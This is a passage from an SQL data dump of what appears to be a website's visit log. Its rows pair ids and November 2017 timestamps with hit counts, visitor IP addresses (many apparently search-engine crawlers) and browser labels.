0,0,'217.182.132.184','other'),(178329,1510910265,1,1,0,0,'178.154.171.4','other'),(178330,1510910994,1,1,0,0,'213.180.203.8','other'),(178331,1510911327,1,1,0,0,'51.255.65.88','other'),(178332,1510911733,2,2,0,0,'141.8.142.74','other'),(178333,1510912059,1,1,0,0,'217.182.132.177','other'),(178334,1510912259,1,1,0,0,'217.182.132.84','other'),(178335,1510912378,1,1,0,0,'37.53.253.196','firefox'),(178336,1510912471,53,53,0,0,'5.189.169.91','other'),(178337,1510912630,1,0,1,0,'66.249.64.29',''),(178338,1510912865,1,1,0,0,'157.55.39.37','other'),(178339,1510912913,1,1,0,0,'130.180.216.218','chrome'),(178340,1510913352,1,1,0,0,'141.8.142.74','other'),(178341,1510913564,1,1,0,0,'217.182.132.60','other'),(178342,1510913625,1,1,0,0,'51.255.65.75','other'),(178343,1510913873,1,1,0,0,'62.149.10.10','other'),(178344,1510914231,1,1,0,0,'93.175.236.51','chrome'),(178345,1510914300,1,1,0,0,'87.250.224.46','other'),(178346,1510914807,1,0,1,0,'66.249.64.29',''),(178347,1510915062,1,1,0,0,'157.55.39.37','other'),(178348,1510915141,111,111,0,0,'192.151.157.210','other'),(178349,1510915455,1,1,0,0,'91.196.178.68','chrome'),(178350,1510916057,123,123,0,0,'192.151.157.210','other'),(178351,1510916091,1,1,0,0,'141.8.142.74','other'),(178352,1510916222,1,1,0,0,'188.32.129.128','msie'),(178353,1510916375,1,1,0,0,'178.154.171.81','other'),(178354,1510916694,1,1,0,0,'217.182.132.95','other'),(178355,1510917021,1,1,0,0,'91.196.178.67','chrome'),(178356,1510917170,1,1,0,0,'51.255.65.26','other'),(178357,1510918291,1,1,0,0,'8.29.198.25','other'),(178358,1510918639,2,2,0,0,'141.8.142.74','other'),(178359,1510918818,1,1,0,0,'216.244.66.237','other'),(178360,1510919167,1,1,0,0,'157.55.39.229','other'),(178361,1510919224,1,1,0,0,'164.132.162.156','other'),(178362,1510919655,41,41,0,0,'91.209.51.22','other'),(178363,1510920155,1,1,0,0,'157.55.39.70','other'),(178364,1510920183,1,1,0,0,'216.244.66.237','other'),(178365,1510920805,1,1,0,0,'66.249.64.28','chrome'),(178366,1510920898,1,1,0,0,'178.154.171.55','other'),(178367,1510920902,1,1,0,0,'178.154.171.10','other'),(178368,1510921708,1,1,0,0,'216.244.66.237','other'),(178369,1510921715,1,1,0,0,'66.249.64.30','chrome'),(178370,1510921785,1,1,0,0,'91.196.178.167','chrome'),(178371,1510921797,1,1,0,0,'194.8.145.33','firefox'),(178372,1510922637,1,1,0,0,'66.249.64.28','chrome'),(178373,1510922775,1,0,1,0,'66.249.64.30',''),(178374,1510922821,1,1,0,0,'95.132.7.125','firefox'),(178375,1510923222,1,1,0,0,'216.244.66.237','other'),(178376,1510923231,2,0,2,0,'66.249.64.29',''),(178377,1510923314,2,2,0,0,'178.154.171.88','other'),(178378,1510923903,1,1,0,0,'54.165.59.7','other'),(178379,1510923994,1,1,0,0,'91.222.246.222','firefox'),(178380,1510924262,1,0,1,0,'66.249.64.28',''),(178381,1510924471,1,0,1,0,'66.249.64.30',''),(178382,1510924682,1,1,0,0,'213.180.203.8','other'),(178383,1510924925,1,1,0,0,'37.52.21.251','firefox'),(178384,1510924953,1,1,0,0,'91.196.178.65','chrome'),(178385,1510925138,2,2,0,0,'141.8.142.74','other'),(178386,1510925176,1,1,0,0,'54.165.59.7','other'),(178387,1510925191,1,1,0,0,'157.55.39.229','other'),(178388,1510925193,1,0,1,0,'66.249.64.28',''),(178389,1510925343,1,1,0,0,'178.154.171.88','other'),(178390,1510925700,1,1,0,0,'91.196.178.71','firefox'),(178391,1510925929,2,0,2,0,'66.249.64.29',''),(178392,1510926205,1,1,0,0,'216.244.66.237','other'),(178393,1510926406,1,1,0,0,'5.45.207.82','other'),(178394,1510926542,1,1,0,0,'37.9.113.134','other'),(178395,1510926546,1,1,0,0,'37.9.113.132','other'),(178396,1510926783,1,1,0,0,'37.55.57.49','chrome'),(178397,1510926904,1,1,0,0,'91.196.177.46','firefox'),(178398,1510927180,1,1,0,0,'141.8.142.74','other'),(178399,1510928085,1,1,0,0,'37.9.113.101','other'),(178400,1510928787,1,1,0,0,'157.55.39.70','other'),(178401,1510929129,1,1,0,0,'8.29.198.25','other'),(178402,1510929164,1,1,0,0,'37.53.192.248','chrome'),(178403,1510930306,1,1,0,0,'66.249.70.29','chrome'),(178404,1510930364,1,1,0,0,'178.62.238.64','chrome'),(178405,1510930436,1,0,1,0,'66.249.64.28',''),(178406,1510931357,1,0,1,0,'66.249.64.29',''),(178407,1510931581,1,1,0,0,'95.132.20.112','firefox'),(178408,1510932278,1,1,0,0,'216.244.66.237','other'),(178409,1510932350,1,0,1,0,'66.249.70.27',''),(178410,1510934120,1,0,1,0,'66.249.64.29',''),(178411,1510934339,1,1,0,0,'40.77.167.30','other'),(178412,1510934660,1,1,0,0,'180.76.15.23','other'),(178413,1510935450,1,1,0,0,'51.255.65.50','other'),(178414,1510935756,1,0,1,0,'66.249.64.28',''),(178415,1510935884,1,1,0,0,'157.55.39.229','other'),(178416,1510936201,1,1,0,0,'51.255.65.24','other'),(178417,1510936590,1,1,0,0,'51.255.65.62','other'),(178418,1510936976,1,0,1,0,'66.249.64.30',''),(178419,1510937136,1,1,0,0,'199.58.86.211','other'),(178420,1510937551,1,1,0,0,'51.255.65.20','other'),(178421,1510938556,1,1,0,0,'217.182.132.73','other'),(178422,1510938823,1,1,0,0,'157.55.39.229','other'),(178423,1510939031,1,1,0,0,'51.255.65.64','other'),(178424,1510939101,1,1,0,0,'66.249.64.30','chrome'),(178425,1510939418,1,1,0,0,'91.196.178.39','chrome'),(178426,1510939949,1,1,0,0,'151.80.27.116','other'),(178427,1510939969,1,1,0,0,'8.29.198.27','other'),(178428,1510940253,1,0,1,0,'66.249.70.29',''),(178429,1510940816,1,1,0,0,'157.55.39.229','other'),(178430,1510940846,1,1,0,0,'51.255.65.25','other'),(178431,1510940987,1,1,0,0,'51.255.65.91','other'),(178432,1510941146,1,1,0,0,'51.255.65.81','other'),(178433,1510941573,1,1,0,0,'51.255.71.127','other'),(178434,1510941798,1,1,0,0,'217.182.132.149','other'),(178435,1510942067,1,1,0,0,'217.182.132.192','other'),(178436,1510942709,1,1,0,0,'217.182.132.191','other'),(178437,1510942721,1,1,0,0,'51.255.65.3','other'),(178438,1510942885,1,1,0,0,'91.196.178.66','other'),(178439,1510943049,1,1,0,0,'66.249.64.28','chrome'),(178440,1510943140,1,1,0,0,'178.154.171.88','other'),(178441,1510943193,1,1,0,0,'66.249.70.29','chrome'),(178442,1510943882,1,1,0,0,'216.244.66.237','other'),(178443,1510944630,1,1,0,0,'217.182.132.36','other'),(178444,1510944707,1,1,0,0,'137.74.207.120','other'),(178445,1510944864,1,1,0,0,'217.69.136.205','other'),(178446,1510945002,1,1,0,0,'217.182.132.59','other'),(178447,1510945652,1,1,0,0,'40.77.167.30','other'),(178448,1510945735,1,1,0,0,'217.69.133.246','other'),(178449,1510947229,1,1,0,0,'51.255.65.81','other'),(178450,1510948259,1,1,0,0,'157.55.39.37','other'),(178451,1510948619,2,0,2,0,'66.249.64.28',''),(178452,1510948764,1,1,0,0,'157.55.39.229','other'),(178453,1510948933,1,1,0,0,'51.255.65.45','other'),(178454,1510949177,1,1,0,0,'40.77.167.30','other'),(178455,1510949461,1,0,1,0,'66.249.64.30',''),(178456,1510949529,1,1,0,0,'217.182.132.70','other'),(178457,1510949839,1,1,0,0,'51.255.65.39','other'),(178458,1510950378,1,0,1,0,'66.249.64.29',''),(178459,1510950810,1,1,0,0,'8.29.198.26','other'),(178460,1510951593,1,0,1,0,'66.249.64.28',''),(178461,1510951951,1,1,0,0,'37.54.20.233','chrome'),(178462,1510952825,1,1,0,0,'137.74.207.116','other'),(178463,1510953718,1,1,0,0,'217.69.134.175','other'),(178464,1510953727,1,1,0,0,'217.182.132.94','other'),(178465,1510953804,1,1,0,0,'217.182.132.70','other'),(178466,1510953966,1,1,0,0,'157.55.39.229','other'),(178467,1510954290,1,0,1,0,'66.249.64.29',''),(178468,1510954941,1,1,0,0,'137.74.207.101','other'),(178469,1510955439,1,0,1,0,'66.249.70.29',''),(178470,1510955456,1,1,0,0,'40.77.167.30','other'),(178471,1510956831,8,8,0,0,'69.30.234.2','other'),(178472,1510956845,2,0,2,0,'66.249.64.30',''),(178473,1510957225,1,1,0,0,'66.249.64.30','chrome'),(178474,1510957276,1,1,0,0,'52.203.150.80','firefox'),(178475,1510957661,1,1,0,0,'217.182.132.34','other'),(178476,1510957700,1,0,1,0,'66.249.64.29',''),(178477,1510957760,1,1,0,0,'51.255.65.48','other'),(178478,1510957802,1,1,0,0,'51.255.65.34','other'),(178479,1510957974,1,1,0,0,'217.182.132.17','other'),(178480,1510958615,1,1,0,0,'164.132.162.159','other'),(178481,1510959225,1,1,0,0,'137.74.201.100','other'),(178482,1510959617,1,1,0,0,'46.48.13.161','chrome'),(178483,1510960076,1,1,0,0,'217.182.132.240','other'),(178484,1510960243,1,0,1,0,'66.249.64.29',''),(178485,1510960451,1,1,0,0,'217.182.132.22','other'),(178486,1510961649,1,1,0,0,'8.29.198.26','other'),(178487,1510962724,1,0,1,0,'66.249.70.29',''),(178488,1510962917,1,1,0,0,'141.8.142.74','other'),(178489,1510963103,1,1,0,0,'217.182.132.29','other'),(178490,1510963315,1,1,0,0,'40.77.167.126','other'),(178491,1510963964,1,1,0,0,'51.255.65.7','other'),(178492,1510964370,2,0,2,0,'66.249.64.30',''),(178493,1510964688,1,0,1,0,'66.249.70.25',''),(178494,1510964990,1,1,0,0,'66.249.70.27','chrome'),(178495,1510965291,1,0,1,0,'66.249.64.29',''),(178496,1510965503,1,1,0,0,'217.182.132.185','other'),(178497,1510966474,2,0,2,0,'66.249.64.29',''),(178498,1510966874,1,1,0,0,'217.182.132.52','other'),(178499,1510967731,1,0,1,0,'66.249.70.27',''),(178500,1510967771,1,0,1,0,'66.249.70.25',''),(178501,1510967821,1,0,1,0,'66.249.64.28',''),(178502,1510967978,1,1,0,0,'157.55.39.229','other'),(178503,1510968097,1,1,0,0,'217.182.132.57','other'),(178504,1510969145,1,1,0,0,'51.255.65.75','other'),(178505,1510969401,1,0,1,0,'66.249.64.30',''),(178506,1510969564,1,1,0,0,'217.182.132.66','other'),(178507,1510969717,1,1,0,0,'137.74.207.120','other'),(178508,1510970241,1,1,0,0,'164.132.162.159','other'),(178509,1510970255,2,0,2,0,'66.249.64.28',''),(178510,1510971257,1,0,1,0,'66.249.64.30',''),(178511,1510971802,1,1,0,0,'178.154.171.88','other'),(178512,1510972225,1,1,0,0,'146.185.223.5','chrome'),(178513,1510972483,1,1,0,0,'8.29.198.25','other'),(178514,1510972753,1,0,1,0,'66.249.64.28',''),(178515,1510972910,1,1,0,0,'164.132.162.160','other'),(178516,1510973391,1,0,1,0,'66.249.64.30',''),(178517,1510973851,2,2,0,0,'217.182.132.19','other'),(178518,1510974061,1,0,1,0,'66.249.64.29',''),(178519,1510974137,1,1,0,0,'51.255.65.24','other'),(178520,1510974265,1,1,0,0,'137.74.207.119','other'),(178521,1510974834,1,1,0,0,'51.255.65.25','other'),(178522,1510975000,1,1,0,0,'217.182.132.170','other'),(178523,1510975412,1,1,0,0,'51.255.71.117','other'),(178524,1510975673,1,1,0,0,'209.90.225.243','chrome'),(178525,1510975703,1,1,0,0,'51.255.65.74','other'),(178526,1510976070,1,0,1,0,'66.249.64.30',''),(178527,1510976233,1,1,0,0,'46.48.13.161','chrome'),(178528,1510977042,1,1,0,0,'217.182.132.94','other'),(178529,1510977280,1,1,0,0,'66.249.64.29','chrome'),(178530,1510979030,1,1,0,0,'51.255.65.41','other'),(178531,1510979119,1,1,0,0,'157.55.39.229','other'),(178532,1510979624,1,1,0,0,'87.250.224.46','other'),(178533,1510979660,1,0,1,0,'66.249.64.30',''),(178534,1510979960,1,1,0,0,'217.182.132.88','other'),(178535,1510980057,1,1,0,0,'217.182.132.241','other'),(178536,1510980368,1,1,0,0,'66.249.64.29','chrome'),(178537,1510980646,1,1,0,0,'216.244.66.237','other'),(178538,1510980720,1,1,0,0,'66.249.70.27','chrome'),(178539,1510981037,1,1,0,0,'141.8.142.74','other'),(178540,1510981336,1,1,0,0,'217.182.132.170','other'),(178541,1510981886,1,0,1,0,'66.249.64.28',''),(178542,1510982252,1,1,0,0,'178.154.171.55','other'),(178543,1510982337,1,1,0,0,'199.30.25.142','other'),(178544,1510982818,1,1,0,0,'66.249.64.29','chrome'),(178545,1510982960,88,88,0,0,'88.99.19.242','other'),(178546,1510982990,1,1,0,0,'141.8.142.74','other'),(178547,1510983256,1,0,1,0,'66.249.64.28',''),(178548,1510983314,1,1,0,0,'8.29.198.26','other'),(178549,1510983317,1,0,1,0,'66.249.70.25',''),(178550,1510983776,1,1,0,0,'51.255.65.63','other'),(178551,1510984325,1,1,0,0,'51.255.65.22','other'),(178552,1510984336,1,1,0,0,'66.249.70.27','chrome'),(178553,1510984354,1,1,0,0,'51.255.65.50','other'),(178554,1510984419,1,1,0,0,'51.255.71.132','other'),(178555,1510985163,1,1,0,0,'157.55.39.37','other'),(178556,1510986146,1,1,0,0,'217.182.132.51','other'),(178557,1510986239,1,1,0,0,'137.74.201.100','other'),(178558,1510986458,1,1,0,0,'66.249.70.29','chrome'),(178559,1510986824,1,0,1,0,'66.249.64.29',''),(178560,1510987308,1,1,0,0,'217.182.132.174','other'),(178561,1510987368,1,1,0,0,'180.76.15.28','other'),(178562,1510987571,1,1,0,0,'66.249.64.29','chrome'),(178563,1510988099,1,1,0,0,'178.154.171.88','other'),(178564,1510988319,1,1,0,0,'217.182.132.71','other'),(178565,1510990085,1,1,0,0,'40.77.167.126','other'),(178566,1510990586,1,1,0,0,'157.55.39.229','other'),(178567,1510990839,1,1,0,0,'51.255.65.83','other'),(178568,1510990868,1,0,1,0,'66.249.70.27',''),(178569,1510991370,1,1,0,0,'217.182.132.170','other'),(178570,1510991823,1,1,0,0,'178.154.171.88','other'),(178571,1510991846,1,1,0,0,'66.249.70.27','chrome'),(178572,1510992718,1,1,0,0,'164.132.162.159','other'),(178573,1510993524,1,1,0,0,'51.255.65.21','other'),(178574,1510993923,1,1,0,0,'37.55.57.49','firefox'),(178575,1510994138,1,1,0,0,'8.29.198.25','other'),(178576,1510994319,1,1,0,0,'217.182.132.78','other'),(178577,1510994694,1,1,0,0,'178.154.171.60','other'),(178578,1510995220,1,1,0,0,'188.32.7.34','msie'),(178579,1510995275,5,5,0,0,'213.133.111.165','other'),(178580,1510995629,1,1,0,0,'217.182.132.190','other'),(178581,1510995833,1,1,0,0,'51.255.65.41','other'),(178582,1510996020,1,1,0,0,'216.244.66.237','other'),(178583,1510996036,1,1,0,0,'141.8.142.74','other'),(178584,1510996534,1,1,0,0,'217.182.132.95','other'),(178585,1510996601,1,1,0,0,'51.255.65.19','other'),(178586,1510996624,1,0,1,0,'66.249.64.28',''),(178587,1510996849,1,1,0,0,'164.132.162.155','other'),(178588,1510997381,1,1,0,0,'157.55.39.229','other'),(178589,1510997450,1,1,0,0,'51.255.65.22','other'),(178590,1510997565,1,1,0,0,'51.255.65.71','other'),(178591,1510998039,1,1,0,0,'87.250.224.46','other'),(178592,1510999049,1,1,0,0,'217.182.132.68','other'),(178593,1510999064,1,1,0,0,'51.255.65.90','other'),(178594,1510999179,1,1,0,0,'180.76.15.163','other'),(178595,1510999461,1,1,0,0,'40.77.167.30','other'),(178596,1510999559,1,1,0,0,'66.249.64.28','chrome'),(178597,1510999666,1,1,0,0,'217.182.132.71','other'),(178598,1510999753,1,1,0,0,'66.249.70.29','chrome'),(178599,1511000396,1,0,1,0,'66.249.64.30',''),(178600,1511000628,1,1,0,0,'137.74.207.120','other'),(178601,1511000666,1,1,0,0,'51.255.65.9','other'),(178602,1511001110,1,1,0,0,'91.209.11.236','other'),(178603,1511001275,1,1,0,0,'217.182.132.240','other'),(178604,1511001363,2,2,0,0,'178.154.171.88','other'),(178605,1511001570,1,1,0,0,'51.255.64.106','other'),(178606,1511001597,1,0,1,0,'66.249.70.27',''),(178607,1511001716,1,1,0,0,'157.55.39.229','other'),(178608,1511003342,2,2,0,0,'91.209.11.236','other'),(178609,1511003419,1,1,0,0,'51.255.65.28','other'),(178610,1511003489,1,1,0,0,'217.182.132.75','other'),(178611,1511003648,1,1,0,0,'51.255.65.85','other'),(178612,1511004165,1,1,0,0,'66.249.70.27','chrome'),(178613,1511004189,1,1,0,0,'51.255.65.38','other'),(178614,1511004283,1,1,0,0,'66.249.64.29','chrome'),(178615,1511004352,1,1,0,0,'51.255.65.36','other'),(178616,1511004652,2,2,0,0,'91.209.11.236','other'),(178617,1511004708,1,0,1,0,'66.249.64.28',''),(178618,1511004995,1,1,0,0,'8.29.198.26','other'),(178619,1511005171,1,1,0,0,'51.255.71.128','other'),(178620,1511005303,1,1,0,0,'178.140.51.103','msie'),(178621,1511006677,1,1,0,0,'91.209.11.236','other'),(178622,1511006723,1,1,0,0,'51.255.65.79','other'),(178623,1511007288,1,1,0,0,'217.182.132.241','other'),(178624,1511007390,1,1,0,0,'51.255.71.119','other'),(178625,1511008052,1,1,0,0,'217.182.132.188','other'),(178626,1511008158,1,1,0,0,'51.255.65.36','other'),(178627,1511008525,1,1,0,0,'217.182.132.54','other'),(178628,1511008602,1,1,0,0,'66.249.70.27','chrome'),(178629,1511008778,1,1,0,0,'66.249.64.30','chrome'),(178630,1511008834,2,2,0,0,'217.182.132.154','other'),(178631,1511009222,1,1,0,0,'87.250.224.46','other'),(178632,1511009275,1,1,0,0,'217.182.132.157','other'),(178633,1511009635,2,2,0,0,'91.209.11.236','other'),(178634,1511009734,1,1,0,0,'178.154.171.88','other'),(178635,1511009772,2,2,0,0,'51.255.65.85','other'),(178636,1511010177,1,1,0,0,'51.255.65.69','other'),(178637,1511010428,1,1,0,0,'217.182.132.95','other'),(178638,1511010616,2,2,0,0,'91.209.11.236','other'),(178639,1511010991,1,0,1,0,'66.249.70.29',''),(178640,1511011663,1,1,0,0,'51.255.65.13','other'),(178641,1511012323,1,1,0,0,'40.77.167.30','other'),(178642,1511012336,1,1,0,0,'164.132.162.157','other'),(178643,1511013007,1,0,1,0,'66.249.64.29',''),(178644,1511013402,1,1,0,0,'217.182.132.184','other'),(178645,1511013739,1,0,1,0,'66.249.70.29',''),(178646,1511013828,2,2,0,0,'91.209.11.236','other'),(178647,1511013874,1,1,0,0,'164.132.162.188','other'),(178648,1511013926,1,1,0,0,'66.249.70.25','chrome'),(178649,1511014130,1,1,0,0,'66.249.64.30','chrome'),(178650,1511014676,1,1,0,0,'141.8.142.74','other'),(178651,1511014756,1,1,0,0,'91.209.11.236','other'),(178652,1511014977,1,1,0,0,'217.182.132.179','other'),(178653,1511015267,1,0,1,0,'66.249.64.28',''),(178654,1511015363,1,1,0,0,'51.255.65.45','other'),(178655,1511015605,1,1,0,0,'141.8.142.74','other'),(178656,1511015831,1,1,0,0,'8.29.198.27','other'),(178657,1511016170,1,1,0,0,'217.182.132.29','other'),(178658,1511016240,1,1,0,0,'91.209.11.236','other'),(178659,1511016567,1,1,0,0,'40.77.167.126','other'),(178660,1511016638,1,1,0,0,'180.76.15.32','other'),(178661,1511016962,1,1,0,0,'217.182.132.190','other'),(178662,1511017178,2,2,0,0,'141.8.142.74','other'),(178663,1511017207,1,1,0,0,'216.244.66.237','other'),(178664,1511017469,1,1,0,0,'217.182.132.22','other'),(178665,1511017732,1,1,0,0,'40.77.167.126','other'),(178666,1511018043,1,1,0,0,'217.182.132.33','other'),(178667,1511018468,1,1,0,0,'164.132.162.156','other'),(178668,1511018540,1,1,0,0,'51.255.71.110','other'),(178669,1511018664,1,1,0,0,'51.255.65.85','other'),(178670,1511018883,1,1,0,0,'216.244.66.237','other'),(178671,1511018970,1,1,0,0,'66.249.70.25','chrome'),(178672,1511019125,1,1,0,0,'51.255.65.22','other'),(178673,1511019223,1,1,0,0,'51.255.71.114','other'),(178674,1511019255,1,1,0,0,'66.249.64.29','chrome'),(178675,1511019337,1,1,0,0,'40.77.167.30','other'),(178676,1511019452,1,1,0,0,'51.255.65.50','other'),(178677,1511020552,1,1,0,0,'216.244.66.237','other'),(178678,1511020560,1,1,0,0,'40.77.167.126','other'),(178679,1511020750,1,1,0,0,'51.255.65.82','other'),(178680,1511020753,2,2,0,0,'91.209.11.236','other'),(178681,1511020784,1,1,0,0,'141.8.142.74','other'),(178682,1511020962,1,1,0,0,'51.255.65.81','other'),(178683,1511020978,1,1,0,0,'217.182.132.91','other'),(178684,1511021101,1,1,0,0,'51.255.71.115','other'),(178685,1511021389,1,1,0,0,'217.182.132.58','other'),(178686,1511022208,1,1,0,0,'94.156.144.191','firefox'),(178687,1511022226,1,1,0,0,'51.255.65.93','other'),(178688,1511022268,1,1,0,0,'91.209.11.236','other'),(178689,1511022872,1,1,0,0,'51.255.65.36','other'),(178690,1511022875,1,0,1,0,'66.249.64.30',''),(178691,1511023258,1,1,0,0,'141.8.142.74','other'),(178692,1511023478,1,1,0,0,'217.182.132.61','other'),(178693,1511023542,1,1,0,0,'37.73.220.218','chrome'),(178694,1511023601,1,1,0,0,'66.249.70.29','chrome'),(178695,1511023794,1,1,0,0,'51.255.71.111','other'),(178696,1511024139,2,2,0,0,'91.209.11.236','other'),(178697,1511024177,1,1,0,0,'51.255.65.29','other'),(178698,1511024395,1,1,0,0,'51.255.71.112','other'),(178699,1511024475,1,1,0,0,'217.182.132.53','other'),(178700,1511024527,1,1,0,0,'178.154.171.88','other'),(178701,1511025029,2,1,1,0,'66.249.64.29',''),(178702,1511025139,1,1,0,0,'176.31.231.10','other'),(178703,1511025404,1,1,0,0,'51.255.65.51','other'),(178704,1511025896,2,2,0,0,'141.8.142.74','other'),(178705,1511026318,1,1,0,0,'91.209.11.236','other'),(178706,1511026667,1,1,0,0,'8.29.198.27','other'),(178707,1511026680,1,1,0,0,'217.182.132.146','other'),(178708,1511027013,1,1,0,0,'141.8.142.74','other'),(178709,1511027066,1,1,0,0,'217.182.132.191','other'),(178710,1511027298,1,1,0,0,'216.244.66.237','other'),(178711,1511027332,1,1,0,0,'51.255.65.74','other'),(178712,1511027568,1,1,0,0,'51.255.71.111','other'),(178713,1511027775,1,1,0,0,'91.209.11.236','other'),(178714,1511027839,1,1,0,0,'51.255.65.49','other'),(178715,1511028174,1,1,0,0,'217.182.132.151','other'),(178716,1511028663,1,1,0,0,'66.249.70.29','chrome'),(178717,1511029386,1,1,0,0,'51.255.65.57','other'),(178718,1511029584,2,2,0,0,'91.209.11.236','other'),(178719,1511030033,1,1,0,0,'220.181.132.181','chrome'),(178720,1511030061,1,1,0,0,'106.120.162.96','chrome'),(178721,1511030535,1,1,0,0,'40.77.167.30','other'),(178722,1511030619,1,1,0,0,'164.132.162.153','other'),(178723,1511030912,1,1,0,0,'164.132.162.187','other'),(178724,1511031329,1,1,0,0,'137.74.203.194','other'),(178725,1511031443,3,3,0,0,'91.209.11.236','other'),(178726,1511031477,1,0,1,0,'66.249.64.29',''),(178727,1511031618,1,1,0,0,'37.9.113.132','other'),(178728,1511032491,1,1,0,0,'217.182.132.6','other'),(178729,1511032546,1,1,0,0,'157.55.39.229','other'),(178730,1511032876,1,1,0,0,'51.255.65.56','other'),(178731,1511032886,2,2,0,0,'91.209.11.236','other'),(178732,1511033087,1,0,1,0,'66.249.64.29',''),(178733,1511033275,1,1,0,0,'178.154.171.88','other'),(178734,1511033492,1,1,0,0,'157.55.39.246','other'),(178735,1511034006,1,1,0,0,'87.250.224.46','other'),(178736,1511034115,1,1,0,0,'164.132.162.160','other'),(178737,1511034396,1,1,0,0,'217.182.132.54','other'),(178738,1511035775,1,1,0,0,'37.204.81.64','chrome'),(178739,1511035840,1,1,0,0,'66.249.64.30','chrome'),(178740,1511035949,1,1,0,0,'66.249.70.29','chrome'),(178741,1511035968,1,1,0,0,'207.46.13.178','other'),(178742,1511036119,1,1,0,0,'51.255.65.52','other'),(178743,1511036518,1,1,0,0,'217.182.132.75','other'),(178744,1511036767,1,1,0,0,'195.242.80.92','firefox'),(178745,1511036822,1,1,0,0,'157.55.39.246','other'),(178746,1511037500,1,1,0,0,'8.29.198.26','other'),(178747,1511037562,1,1,0,0,'51.255.65.50','other'),(178748,1511037686,1,1,0,0,'51.255.71.118','other'),(178749,1511037808,1,1,0,0,'54.165.59.7','other'),(178750,1511037921,1,1,0,0,'162.210.196.98','other'),(178751,1511038227,1,1,0,0,'51.255.65.48','other'),(178752,1511038422,1,1,0,0,'217.182.132.185','other'),(178753,1511038676,1,1,0,0,'77.123.27.199','other'),(178754,1511038760,1,1,0,0,'141.8.142.74','other'),(178755,1511039237,1,1,0,0,'217.182.132.51','other'),(178756,1511039530,1,1,0,0,'157.55.39.229','other'),(178757,1511039936,1,1,0,0,'51.255.71.110','other'),(178758,1511040070,1,0,1,0,'66.249.64.29',''),(178759,1511040158,1,1,0,0,'217.182.132.184','other'),(178760,1511040287,1,1,0,0,'217.182.132.30','other'),(178761,1511040703,1,1,0,0,'66.249.64.28','chrome'),(178762,1511040744,1,1,0,0,'66.249.70.25','chrome'),(178763,1511041358,1,1,0,0,'157.55.39.229','other'),(178764,1511042732,1,1,0,0,'46.211.24.120','chrome'),(178765,1511042739,1,1,0,0,'164.132.162.160','other'),(178766,1511042863,1,1,0,0,'178.154.171.88','other'),(178767,1511042932,1,1,0,0,'51.255.65.29','other'),(178768,1511043000,1,1,0,0,'217.182.132.22','other'),(178769,1511043129,1,1,0,0,'94.154.239.69','other'),(178770,1511043444,1,1,0,0,'157.55.39.229','other'),(178771,1511043894,1,1,0,0,'40.77.167.126','other'),(178772,1511044058,1,1,0,0,'217.182.132.16','other'),(178773,1511044177,1,1,0,0,'217.182.132.33','other'),(178774,1511044331,1,1,0,0,'66.249.64.29','chrome'),(178775,1511044347,1,1,0,0,'216.244.66.237','other'),(178776,1511044377,1,1,0,0,'66.249.70.25','chrome'),(178777,1511045712,1,0,1,0,'66.249.64.28',''),(178778,1511045751,1,1,0,0,'207.46.13.178','other'),(178779,1511045823,1,1,0,0,'216.244.66.237','other'),(178780,1511045860,1,1,0,0,'40.77.167.126','other'),(178781,1511046446,1,1,0,0,'217.182.132.181','other'),(178782,1511046550,1,1,0,0,'51.255.65.81','other'),(178783,1511046767,1,1,0,0,'51.255.65.51','other'),(178784,1511047103,1,1,0,0,'201.18.18.173','chrome'),(178785,1511047127,1,1,0,0,'51.255.65.17','other'),(178786,1511047868,1,1,0,0,'66.249.64.30','chrome'),(178787,1511047889,2,2,0,0,'54.165.59.7','other'),(178788,1511047892,1,1,0,0,'66.249.70.27','chrome'),(178789,1511048276,1,1,0,0,'51.255.65.14','other'),(178790,1511048303,1,1,0,0,'217.182.132.146','other'),(178791,1511048326,1,1,0,0,'8.29.198.27','other'),(178792,1511048952,1,1,0,0,'217.182.132.185','other'),(178793,1511049075,1,1,0,0,'54.219.178.100','chrome'),(178794,1511049183,1,1,0,0,'51.255.65.3','other'),(178795,1511049393,1,1,0,0,'217.182.132.170','other'),(178796,1511049439,1,1,0,0,'217.182.132.52','other'),(178797,1511049473,1,0,1,0,'66.249.70.25',''),(178798,1511050107,1,1,0,0,'217.182.132.72','other'),(178799,1511050399,1,1,0,0,'51.255.65.21','other'),(178800,1511050955,1,1,0,0,'51.255.71.112','other'),(178801,1511051752,1,0,1,0,'66.249.64.29',''),(178802,1511052047,1,1,0,0,'217.182.132.178','other'),(178803,1511052231,1,1,0,0,'66.249.64.28','chrome'),(178804,1511052235,1,1,0,0,'66.249.70.27','chrome'),(178805,1511052300,1,1,0,0,'217.182.132.154','other'),(178806,1511052500,1,1,0,0,'51.255.65.21','other'),(178807,1511052596,1,1,0,0,'217.182.132.24','other'),(178808,1511052884,1,1,0,0,'217.182.132.72','other'),(178809,1511052897,1,1,0,0,'51.255.65.9','other'),(178810,1511053294,1,1,0,0,'51.255.65.12','other'),(178811,1511053635,1,1,0,0,'217.182.132.65','other'),(178812,1511054848,1,1,0,0,'40.77.167.126','other'),(178813,1511054920,1,1,0,0,'51.255.65.31','other'),(178814,1511055209,1,1,0,0,'51.255.65.68','other'),(178815,1511055459,1,1,0,0,'51.255.65.34','other'),(178816,1511055690,1,1,0,0,'51.255.65.44','other'),(178817,1511056066,1,0,1,0,'66.249.64.30',''),(178818,1511056172,1,1,0,0,'157.55.39.229','other'),(178819,1511056433,1,1,0,0,'164.132.162.164','other'),(178820,1511056609,1,1,0,0,'51.255.65.63','other'),(178821,1511056779,1,1,0,0,'51.255.71.116','other'),(178822,1511057204,1,1,0,0,'66.249.64.30','chrome'),(178823,1511057212,1,1,0,0,'66.249.70.25','chrome'),(178824,1511057451,1,1,0,0,'173.212.240.226','other'),(178825,1511058061,1,1,0,0,'217.182.132.175','other'),(178826,1511058351,1,1,0,0,'137.74.207.188','other'),(178827,1511058592,1,1,0,0,'157.55.39.246','other'),(178828,1511059155,1,1,0,0,'8.29.198.27','other'),(178829,1511059500,1,0,1,0,'66.249.64.28',''),(178830,1511060490,1,1,0,0,'137.74.207.188','other'),(178831,1511061205,1,1,0,0,'37.9.113.182','other'),(178832,1511062197,1,1,0,0,'217.182.132.85','other'),(178833,1511062860,1,1,0,0,'216.244.66.237','other'),(178834,1511062871,1,1,0,0,'66.249.64.28','chrome'),(178835,1511062875,1,1,0,0,'66.249.70.29','chrome'),(178836,1511062963,1,1,0,0,'217.182.132.50','other'),(178837,1511063038,1,1,0,0,'51.255.65.76','other'),(178838,1511063254,1,1,0,0,'217.182.132.183','other'),(178839,1511064284,1,1,0,0,'217.182.132.88','other'),(178840,1511064508,1,1,0,0,'217.182.132.37','other'),(178841,1511064718,1,1,0,0,'51.255.65.39','other'),(178842,1511065073,1,1,